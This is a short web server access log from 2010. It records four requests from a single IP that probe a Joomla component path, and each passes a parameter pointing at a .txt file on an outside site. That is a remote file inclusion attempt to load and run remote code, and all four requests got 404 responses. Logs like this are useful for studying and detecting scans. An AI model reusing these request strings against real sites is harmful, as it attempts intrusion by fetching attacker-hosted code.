121.78.118.123 - - [21/Apr/2010:08:07:27 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.78.118.123 - - [21/Apr/2010:08:07:27 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.78.118.123 - - [21/Apr/2010:08:07:33 -0500] "GET /logs/access_log.1219708800/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
121.78.118.123 - - [21/Apr/2010:08:07:49 -0500] "GET /logs/access_log.1219708800%20%20/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
